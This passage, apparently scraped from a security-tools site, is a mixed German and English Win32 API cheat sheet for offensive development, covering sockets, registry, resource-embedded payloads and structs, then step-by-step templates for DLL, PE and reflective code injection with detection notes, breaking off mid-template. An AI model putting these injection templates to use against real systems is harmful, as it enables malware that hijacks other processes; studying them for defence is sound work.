    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data on a connected socket.It can be used for both synchronous and asynchronous data transfer.

WSARecv```c int WSARecv( SOCKET s, // Descriptor identifying a connected socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a connected socket, and can also be used for both synchronous and asynchronous data transfer.

root@kitploit:~
[WSASendTo](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasendto)```c
int WSASendTo(
    SOCKET s, // Descriptor identifying a socket.
    LPWSABUF lpBuffers, // Array of buffers containing the data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    const struct sockaddr* lpTo, // Pointer to the sockaddr structure for the target address.
    int iToLen, // Size of the address in lpTo.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data to a specific destination, for use with connection - less socket types such as SOCK_DGRAM.

WSARecvFrom```c int WSARecvFrom( SOCKET s, // Descriptor identifying a socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. struct sockaddr* lpFrom, // Pointer to an address structure that will receive the source address upon completion of the operation. LPINT lpFromlen, // Pointer to the size of the lpFrom address structure. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a specific source, used with connection - less socket types such as SOCK_DGRAM.

root@kitploit:~
[WSAAsyncSelect](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaasyncselect)```c
int WSAAsyncSelect(
    SOCKET s, // Descriptor identifying the socket.
    HWND hWnd, // Handle to the window which should receive the message.
    unsigned int wMsg, // Message to be received when an event occurs.
    long lEvent // Bitmask specifying a group of conditions to be monitored.
); // Requests Windows message - based notification of network events for a socket.

socket```c SOCKET socket( int af, int type, int protocol ); // Creates a new socket for network communication.

root@kitploit:~
[bind](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind)```c
int bind(
    SOCKET s, 
    const struct sockaddr *name, 
    int namelen
); // Binds a socket to a specific local address and port.

listen```c int listen( SOCKET s, int backlog ); // Sets a socket to listen for incoming connections.

root@kitploit:~
[accept](https://learn.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-accept)```c
SOCKET accept(
    SOCKET s, 
    struct sockaddr *addr, 
    int *addrlen
); // Accepts a new incoming connection on a listening socket.

connect```c int connect( SOCKET s, const struct sockaddr *name, int namelen ); // Initiates a connection on a socket to a remote address.

root@kitploit:~
[send](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-send)```c
int send(
    SOCKET s, 
    const char *buf, 
    int len, 
    int flags
); // Sends data on a connected socket.

recv```c int recv( SOCKET s, char *buf, int len, int flags ); // Receives data from a connected socket.

root@kitploit:~
[closesocket](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-closesocket)```c
int closesocket(
    SOCKET s
); //Closes a socket and frees its resources.

gethostbyname```c hostent* gethostbyname( const char* name // either a hostname or an IPv4 address in dotted-decimal notation ); // returns a pointer to a hostent struct. NOTE: Typically better to use getaddrinfo

root@kitploit:~
### Registry-Operationen
[RegOpenKeyExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw)```c
LONG RegOpenKeyExW(
    HKEY hKey, 
    LPCWTSTR lpSubKey, 
    DWORD ulOptions, 
    REGSAM samDesired, 
    PHKEY phkResult
); // Opens the specified registry key.

RegQueryValueExW```c LONG RegQueryValueExW( HKEY hKey, LPCWTSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData ); // Retrieves the type and data of the specified value name associated with an open registry key.

root@kitploit:~
[RegSetValueExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexw)```c
LONG RegSetValueEx(
    HKEY hKey, 
    LPCWTSTR lpValueName, 
    DWORD Reserved, 
    DWORD dwType, 
    const BYTE *lpData, 
    DWORD cbData
); // Sets the data and type of the specified value name associated with an open registry key.

RegCloseKey```c LONG RegCloseKey( HKEY hKey ); // Closes a handle to the specified registry key.

root@kitploit:~
[RegCreateKeyExA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa)```c
LSTATUS RegCreateKeyExA(
  [in]            HKEY                        hKey,
  [in]            LPCSTR                      lpSubKey,
                  DWORD                       Reserved,
  [in, optional]  LPSTR                       lpClass,
  [in]            DWORD                       dwOptions,
  [in]            REGSAM                      samDesired,
  [in, optional]  const LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [out]           PHKEY                       phkResult,
  [out, optional] LPDWORD                     lpdwDisposition
); // Creates the specified registry key. If the key already exists, the function opens it. Note that key names are not case sensitive. 

RegSetValueExA```c LSTATUS RegSetValueExA( [in] HKEY hKey, [in, optional] LPCSTR lpValueName, DWORD Reserved, [in] DWORD dwType, [in] const BYTE *lpData, [in] DWORD cbData ); // Sets the data and type of a specified value under a registry key.

root@kitploit:~
[RegCreateKeyA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeya)```c
LSTATUS RegCreateKeyA(
  [in]           HKEY   hKey,
  [in, optional] LPCSTR lpSubKey,
  [out]          PHKEY  phkResult
); // Creates the specified registry key. If the key already exists in the registry, the function opens it.

RegDeleteKeyA```c LSTATUS RegDeleteKeyA( [in] HKEY hKey, [in] LPCSTR lpSubKey ); // Deletes a subkey and its values. Note that key names are not case sensitive.

root@kitploit:~
[NtRenameKey](https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntrenamekey)```c
__kernel_entry NTSTATUS NtRenameKey(
  [in] HANDLE          KeyHandle,
  [in] PUNICODE_STRING NewName
); // Changes the name of the specified registry key.

Fehlerbehandlung

WSAGetLastError```c int WSAGetLastError( void ); // Returns the error status for the last Windows Sockets operation that failed.

root@kitploit:~
[WSASetLastError](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsasetlasterror)```c
void WSASetLastError(
    int iError
); // Sets the error status for the last Windows Sockets operation.

WSAGetOverlappedResult```c BOOL WSAGetOverlappedResult( SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags ); // Determines the results of an overlapped operation on the specified socket.

root@kitploit:~
[WSAIoctl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaioctl)```c
int WSAIoctl(
    SOCKET s, 
    DWORD dwIoControlCode, 
    LPVOID lpvInBuffer, 
    DWORD cbInBuffer, 
    LPVOID lpvOutBuffer, 
    DWORD cbOutBuffer, 
    LPDWORD lpcbBytesReturned, 
    LPWSAOVERLAPPED lpOverlapped, 
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
); // Controls the mode of a socket.

WSACreateEvent```c WSAEVENT WSACreateEvent( void ); // Creates a new event object.

root@kitploit:~
[WSASetEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasetevent)```c
BOOL WSASetEvent(
    WSAEVENT hEvent
); // Sets the state of the specified event object to signaled.

WSAResetEvent```c BOOL WSAResetEvent( WSAEVENT hEvent ); // Sets the state of the specified event object to nonsignaled.

root@kitploit:~
[WSACloseEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsacloseevent)```c
BOOL WSACloseEvent(
    WSAEVENT hEvent
); // Closes an open event object handle.

WSAWaitForMultipleEvents```c DWORD WSAWaitForMultipleEvents( DWORD cEvents, const WSAEVENT *lphEvents, BOOL fWaitAll, DWORD dwTimeout, BOOL fAlertable ); // Waits for multiple event objects and returns when the specified events are signaled or the time-out interval elapses.

root@kitploit:~
### Ressourcenverwaltung
[FindResource](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea)```c
HRSRC FindResource(
  [in, optional] HMODULE hModule,   // A handle to the module whose portable executable file or an accompanying MUI file contains the resource. If this parameter is NULL, the function searches the module used to create the current process.
  [in]           LPCSTR  lpName,    // The name of the resource.
  [in]           LPCSTR  lpType     // The resource type.
); // Determines the location of a resource with the specified type and name in the specified module.
root@kitploit:~
HRSRC res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);

LoadResource```c HGLOBAL LoadResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource. [in] HRSRC hResInfo // A handle to the resource to be loaded. ); // Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

root@kitploit:~
```c
HGLOBAL resHandle = resHandle = LoadResource(NULL, res);

LockResource```c LPVOID LockResource( [in] HGLOBAL hResData // A handle to the resource to be accessed ); // Retrieves a pointer to the specified resource in memory.

root@kitploit:~
```c
unsigned char * payload = (char *) LockResource(resHandle);

SizeofResource```c DWORD SizeofResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource [in] HRSRC hResInfo // A handle to the resource. This handle must be created by using FindResource ); // Retrieves the size, in bytes, of the specified resource.

root@kitploit:~
```c
unsigned int payload_len = SizeofResource(NULL, res);

Unicode-String-Funktionen```c

#include <wchar.h> // for wide character string routines

root@kitploit:~
### Stringlänge```c
size_t wcslen(
    const wchar_t *str
); // Returns the length of the given wide string.

String kopieren

[wcscpy]```c wchar_t *wcscpy( wchar_t *dest, const wchar_t *src ); // Copies the wide string from src to dest.

root@kitploit:~
[wcsncpy]```c
wchar_t *wcsncpy(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Copies at most count characters from the wide string src to dest.

String-Verkettung

[wcscat]```c wchar_t *wcscat( wchar_t *dest, const wchar_t *src ); // Appends the wide string src to the end of the wide string dest.

root@kitploit:~
[wcsncat]```c
wchar_t *wcsncat(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Appends at most count characters from the wide string src to the end of the wide string dest.

Stringvergleich

[wcscmp]```c int wcscmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically.

root@kitploit:~
[wcsncmp]```c
int wcsncmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically.

[_wcsicmp]```c int _wcsicmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically, ignoring case.

root@kitploit:~
[_wcsnicmp]```c
int _wcsnicmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically, ignoring case.

String-Suche

[wcschr]```c wchar_t *wcschr( const wchar_t *str, wchar_t c ); // Finds the first occurrence of the wide character c in the wide string str.

root@kitploit:~
[wcsrchr]```c
wchar_t *wcsrchr(
    const wchar_t *str, 
    wchar_t c
); // Finds the last occurrence of the wide character c in the wide string str.

[wcspbrk]```c wchar_t *wcspbrk( const wchar_t *str1, const wchar_t *str2 ); // Finds the first occurrence in the wide string str1 of any character from the wide string str2.

root@kitploit:~
[wcsstr]```c
wchar_t *wcsstr(
    const wchar_t *str1, 
    const wchar_t *str2
); // Finds the first occurrence of the wide string str2 in the wide string str1.

[wcstok]```c wchar_t *wcstok( wchar_t *str, const wchar_t *delimiters ); // Splits the wide string str into tokens based on the delimiters.

root@kitploit:~
### Zeichenklassifizierung und Umwandlung
[towupper]```c
wint_t towupper(
    wint_t c
); // Converts a wide character to uppercase.

[towlower]```c wint_t towlower( wint_t c ); // Converts a wide character to lowercase.

root@kitploit:~
[iswalpha]```c
int iswalpha(
    wint_t c
); // Checks if the wide character is an alphabetic character.

[iswdigit]```c int iswdigit( wint_t c ); // Checks if the wide character is a decimal digit.

root@kitploit:~
[iswalnum]```c
int iswalnum(
    wint_t c
); // Checks if the wide character is an alphanumeric character.

[iswspace]```c int iswspace( wint_t c ); // Checks if the wide character is a whitespace character.

root@kitploit:~
[iswxdigit]```c
int iswxdigit(
    wint_t c
); // Checks if the wide character is a valid hexadecimal digit.

Win32-Strukturen-Spickzettel

Allgemeine Strukturen

SYSTEM_INFO```cpp #include <sysinfoapi.h> // Contains information about the current computer system, including the architecture and type of the processor, the number of processors, and the page size. typedef struct _SYSTEM_INFO { union { DWORD dwOemId; struct { WORD wProcessorArchitecture; WORD wReserved; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; DWORD dwPageSize; LPVOID lpMinimumApplicationAddress; LPVOID lpMaximumApplicationAddress; DWORD_PTR dwActiveProcessorMask; DWORD dwNumberOfProcessors; DWORD dwProcessorType; DWORD dwAllocationGranularity; WORD wProcessorLevel; WORD wProcessorRevision; } SYSTEM_INFO;

root@kitploit:~
[**`FILETIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime)```cpp
#include <minwinbase.h>
// Represents the number of 100-nanosecond intervals since January 1, 1601 (UTC). Used for file and system time.
typedef struct _FILETIME {
    DWORD dwLowDateTime;
    DWORD dwHighDateTime;
} FILETIME;

STARTUPINFO```cpp #include <processthreadsapi.h> // Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time. typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; } STARTUPINFOA, *LPSTARTUPINFOA;

root@kitploit:~
[**`PROCESS_INFORMATION`**](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-process_information)```cpp
#include <processthreadsapi.h>
// Contains information about a newly created process and its primary thread.
typedef struct _PROCESS_INFORMATION {
    HANDLE hProcess;
    HANDLE hThread;
    DWORD  dwProcessId;
    DWORD  dwThreadId;
} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;

PROCESSENTRY32```c #include <tlhelp32.h> typedef struct tagPROCESSENTRY32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; ULONG_PTR th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; CHAR szExeFile[MAX_PATH]; } PROCESSENTRY32;

root@kitploit:~
[**`SECURITY_ATTRIBUTES`**](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85))```cpp
// Determines whether the handle can be inherited by child processes and specifies a security descriptor for a new object.
typedef struct _SECURITY_ATTRIBUTES {
    DWORD  nLength;
    LPVOID lpSecurityDescriptor;
    BOOL   bInheritHandle;
} SECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

OVERLAPPED```cpp #inluce <minwinbase.h> // Contains information used in asynchronous (also known as overlapped) input and output (I/O) operations. typedef struct _OVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; } DUMMYSTRUCTNAME; PVOID Pointer; } DUMMYUNIONNAME; HANDLE hEvent; } OVERLAPPED, *LPOVERLAPPED;

root@kitploit:~
[**`GUID`**](https://docs.microsoft.com/en-us/windows/win32/api/guiddef/ns-guiddef-guid)```cpp
#include <guiddef.h>
// Represents a globally unique identifier (GUID), used to identify objects, interfaces, and other items.
typedef struct _GUID {
    unsigned long  Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[8];
} GUID;

MEMORY_BASIC_INFORMATION```cpp #include <winnt.h> // Contains information about a range of pages in the virtual address space of a process. typedef struct _MEMORY_BASIC_INFORMATION { PVOID BaseAddress; PVOID AllocationBase; DWORD AllocationProtect; SIZE_T RegionSize; DWORD State; DWORD Protect; DWORD Type; } MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;

root@kitploit:~
[**`SYSTEMTIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-systemtime)```cpp
#include <minwinbase.h>
// Specifies a date and time, using individual members for the month, day, year, weekday, hour, minute, second, and millisecond.
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME, *LPSYSTEMTIME;

COORD```cpp // Defines the coordinates of a character cell in a console screen buffer, where the origin (0,0) is at the top-left corner. typedef struct _COORD { SHORT X; SHORT Y; } COORD, *PCOORD;

root@kitploit:~
[**`SMALL_RECT`**](https://docs.microsoft.com/en-us/windows/console/small-rect-str)```cpp
//  Defines the coordinates of the upper left and lower right corners of a rectangle.
typedef struct _SMALL_RECT {
    SHORT Left;
    SHORT Top;
    SHORT Right;
    SHORT Bottom;
} SMALL_RECT;

CONSOLE_SCREEN_BUFFER_INFO```cpp // Contains information about a console screen buffer. typedef struct _CONSOLE_SCREEN_BUFFER_INFO { COORD dwSize; COORD dwCursorPosition; WORD wAttributes; SMALL_RECT srWindow; COORD dwMaximumWindowSize; } CONSOLE_SCREEN_BUFFER_INFO, *PCONSOLE_SCREEN_BUFFER_INFO;

root@kitploit:~
[**`WSADATA`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata)```cpp
#include <winsock.h>
// Contains information about the Windows Sockets implementation.
typedef struct WSAData {
    WORD           wVersion;
    WORD           wHighVersion;
    unsigned short iMaxSockets;
    unsigned short iMaxUdpDg;
    char FAR       *lpVendorInfo;
    char           szDescription[WSADESCRIPTION_LEN+1];
    char           szSystemStatus[WSASYS_STATUS_LEN+1];
} WSADATA, *LPWSADATA;

[CRITICAL_SECTION](struct RTL_CRITICAL_SECTION (nirsoft.net))```c++ // Represents a critical section object, which is used to provide synchronization access to a shared resource. typedef struct _RTL_CRITICAL_SECTION { PRTL_CRITICAL_SECTION_DEBUG DebugInfo; LONG LockCount; LONG RecursionCount; HANDLE OwningThread; HANDLE LockSemaphore; ULONG_PTR SpinCount; } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;

root@kitploit:~
[**`WSAPROTOCOL_INFO`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/ns-winsock2-wsaprotocol_infoa)```c++
#include <winsock2.h>
// Contains Windows Sockets protocol information.
typedef struct _WSAPROTOCOL_INFOA {
    DWORD          dwServiceFlags1;
    DWORD          dwServiceFlags2;
    DWORD          dwServiceFlags3;
    DWORD          dwServiceFlags4;
    DWORD          dwProviderFlags;
    GUID           ProviderId;
    DWORD          dwCatalogEntryId;
    WSAPROTOCOLCHAIN ProtocolChain;
    int            iVersion;
    int            iAddressFamily;
    int            iMaxSockAddr;
    int            iMinSockAddr;
    int            iSocketType;
    int            iProtocol;
    int            iProtocolMaxOffset;
    int            iNetworkByteOrder;
    int            iSecurityScheme;
    DWORD          dwMessageSize;
    DWORD          dwProviderReserved;
    CHAR           szProtocol[WSAPROTOCOL_LEN+1];
} WSAPROTOCOL_INFOA, *LPWSAPROTOCOL_INFOA;

MSGHDR```c++ #include <ws2def.h> // Contains message information for use with the sendmsg and recvmsg functions. typedef struct _WSAMSG { LPSOCKADDR name; INT namelen; LPWSABUF lpBuffers; ULONG dwBufferCount; WSABUF Control; ULONG dwFlags; } WSAMSG, *PWSAMSG, *LPWSAMSG;

root@kitploit:~
### Spickzettel für Win32-Sockets-Strukturen (winsock.h)
[**`SOCKADDR`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-sockaddr)```cpp
// A generic socket address structure used for compatibility with various address families.
typedef struct sockaddr {
    u_short sa_family;
    char    sa_data[14];
} SOCKADDR, *PSOCKADDR, *LPSOCKADDR;

SOCKADDR_IN```cpp // Represents an IPv4 socket address, containing the IPv4 address, port number, and address family. typedef struct sockaddr_in { short sin_family; u_short sin_port; struct in_addr sin_addr; char sin_zero[8]; } SOCKADDR_IN, *PSOCKADDR_IN, *LPSOCKADDR_IN;

root@kitploit:~
[**`LINGER`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-linger)```cpp
// Used to set the socket option SO_LINGER, which determines the action taken when unsent data is queued on a socket and a `closesocket` is performed.
typedef struct linger {
    u_short l_onoff;
    u_short l_linger;
} LINGER, *PLINGER, *LPLINGER;

TIMEVAL```cpp // Represents a time interval, used with the select function to specify a timeout period. typedef struct timeval { long tv_sec; long tv_usec; } TIMEVAL, *PTIMEVAL, *LPTIMEVAL;

root@kitploit:~
[**`FD_SET`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-fd_set)```cpp
// Represents a set of sockets used with the `select` function to check for socket events.
typedef struct fd_set {
    u_int fd_count;
    SOCKET fd_array[FD_SETSIZE];
} fd_set, *Pfd_set, *LPfd_set;

Win32 Sockets Structs Spickzettel (winsock2.h)

IN_ADDR```cpp // Represents an IPv4 address. typedef struct in_addr { union { struct { u_char s_b1, s_b2, s_b3, s_b4; } S_un_b; struct { u_short s_w1, s_w2; } S_un_w; u_long S_addr; } S_un; } IN_ADDR, *PIN_ADDR, *LPIN_ADDR;

root@kitploit:~
### Spickzettel für Win32 Sockets Structs (ws2def.h)
[**`ADDRINFO`**](https://learn.microsoft.com/en-us/windows/win32/api/ws2def/ns-ws2def-addrinfow)```cpp
#include <ws2def.h>
// Contains information about an address for use with the `getaddrinfo` function, and is used to build a linked list of addresses.
typedef struct addrinfoW {
    int             ai_flags;
    int             ai_family;
    int             ai_socktype;
    int             ai_protocol;
    size_t          ai_addrlen;
    PWSTR           *ai_canonname;
    struct sockaddr *ai_addr;
    struct addrinfo *ai_next;
} ADDRINFOW, *PADDRINFOW;

WSABUF```cpp #include <ws2def.h> // Contains a pointer to a buffer and its length. Used for scatter/gather I/O operations. typedef struct _WSABUF { ULONG len; __field_bcount(len) CHAR FAR *buf; } WSABUF, FAR * LPWSABUF;

root@kitploit:~
[**`SOCKADDR_IN6`**](https://docs.microsoft.com/en-us/windows/win32/api/ws2ipdef/ns-ws2ipdef-sockaddr_in6)```cpp
#include <ws2ipdef.h>
// Represents an IPv6 socket address, containing the IPv6 address, port number, flow info, and address family.
typedef struct sockaddr_in6 {
    short          sin6_family;
    u_short        sin6_port;
    u_long         sin6_flowinfo;
    struct in6_addr sin6_addr;
    u_long         sin6_scope_id;
} SOCKADDR_IN6, *PSOCKADDR_IN6, *LPSOCKADDR_IN6;

IN6_ADDR```cpp #include <in6addr.h> // Represents an IPv6 address. typedef struct in6_addr { union { u_char Byte[16]; u_short Word[8]; } u; } IN6_ADDR, *PIN6_ADDR, *LPIN6_ADDR;

root@kitploit:~
# Techniken zur Code-Injektion

## 1. DLL-Injektion

Diese Technik zwingt einen Prozess, eine schädliche DLL zu laden.

Wichtige APIs:
- [`OpenProcess`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess)  ```c
  HANDLE OpenProcess(
    DWORD dwDesiredAccess,
    BOOL  bInheritHandle,
    DWORD dwProcessId
  );
  • VirtualAllocEx ```c LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~
  • WriteProcessMemory ```c BOOL WriteProcessMemory( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten );
    root@kitploit:~
  • CreateRemoteThread ```c HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
    root@kitploit:~
  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • LoadLibrary ```c HMODULE LoadLibraryA( LPCSTR lpLibFileName );

Vorlage:

  1. Öffnen Sie den Zielprozess mit OpenProcess
  2. Reservieren Sie Speicher im Zielprozess mit VirtualAllocEx
  3. Schreiben Sie den DLL-Pfad mit WriteProcessMemory in den reservierten Speicher
  4. Rufen Sie die Adresse von LoadLibraryA mit GetProcAddress ab
  5. Erstellen Sie einen Remote-Thread im Zielprozess mit CreateRemoteThread, der auf LoadLibraryA zeigt, und übergeben Sie die Adresse von LoadLibraryA als Parameter lpStartAddress.
  6. (Optional) Verwenden Sie NtCreateThread oder RtlCreateUserThread für alternative Methoden zur Thread-Erstellung

Erkennung und Abwehr:

  • Überwachen Sie auf verdächtige Prozesszugriffe und Speicherbelegungsmuster
  • Verwenden Sie Application Whitelisting, um zu verhindern, dass nicht autorisierte DLLs geladen werden
  • Implementieren Sie Prozessintegritätsprüfungen
  • Verwenden Sie Tools wie Microsofts Process Monitor, um DLL-Injektionsversuche zu erkennen

2. PE-Injektion

Diese Technik besteht darin, schädlichen Code in einem Remote-Prozess oder im selben Prozess (Selbstinjektion) zu schreiben und auszuführen.

Wichtige APIs:

  • OpenThread ```c HANDLE OpenThread( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId );
    root@kitploit:~
  • SuspendThread ```c DWORD SuspendThread( HANDLE hThread );
    root@kitploit:~
  • VirtualAllocEx (siehe oben)
  • WriteProcessMemory (siehe oben)
  • SetThreadContext ```c BOOL SetThreadContext( HANDLE hThread, const CONTEXT *lpContext );
    root@kitploit:~

ResumeThread ```c DWORD ResumeThread( HANDLE hThread );

root@kitploit:~
`NtResumeThread` (undokumentiert)  ```c
NTSTATUS NTAPI NtResumeThread(
  IN HANDLE ThreadHandle,
  OUT PULONG PreviousSuspendCount OPTIONAL
);

Template:

  1. Öffnen Sie den Zielthread mit OpenThread
  2. Suspendieren Sie den Thread mit SuspendThread
  3. Weisen Sie Speicher im Zielprozess mit VirtualAllocEx zu
  4. Schreiben Sie den schädlichen Code mit WriteProcessMemory in den zugewiesenen Speicher
  5. Ändern Sie den Thread-Kontext mit SetThreadContext, sodass er auf den injizierten Code zeigt
  6. Setzen Sie den Thread mit ResumeThread oder NtResumeThread fort

Erkennung und Abwehr:

  • Überwachen Sie auf ungewöhnliche Muster beim Suspendieren und Fortsetzen von Threads
  • Implementieren Sie Speicherintegritätsprüfungen
  • Nutzen Sie Endpoint Detection and Response (EDR)-Lösungen, um verdächtige Speicheränderungen zu erkennen
  • Wenden Sie Techniken zur Prozessspeicherprüfung zur Laufzeit an

3. Reflektive Injektion

Ähnlich wie die PE-Injektion, vermeidet jedoch die Verwendung von LoadLibrary und CreateRemoteThread. Dabei wird ein benutzerdefinierter Loader geschrieben, der eine DLL aus dem Speicher laden kann, ohne den standardmäßigen Windows-Loader zu verwenden.

Wichtige APIs:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • OpenProcess (siehe oben)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~
  • ZwMapViewOfSection (Für den Kernel-Modus dokumentiert) ```c NTSTATUS ZwMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~
  • CreateThread (siehe CreateRemoteThread oben)

Zusätzliche APIs, die manchmal verwendet werden:

  • VirtualQueryEx ```c SIZE_T VirtualQueryEx( HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength );
    root@kitploit:~
  • ReadProcessMemory ```c BOOL ReadProcessMemory( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead );
    root@kitploit:~

Vorlage:

  1. Erstelle ein Datei-Mapping der DLL mit CreateFileMapping
  2. Ordne eine Sicht der Datei mit MapViewOfFile zu
  3. Öffne den Zielprozess mit OpenProcess
  4. Reserviere Speicher im Zielprozess mit VirtualAllocEx
  5. Kopiere den DLL-Inhalt in den reservierten Speicher mit WriteProcessMemory
  6. Führe das manuelle Laden und die Umsetzung (Relocation) der DLL im Zielprozess durch
  • Analysiere die PE-Header
  • Reserviere Speicher für jeden Abschnitt
  • Kopiere Abschnitte in den reservierten Speicher
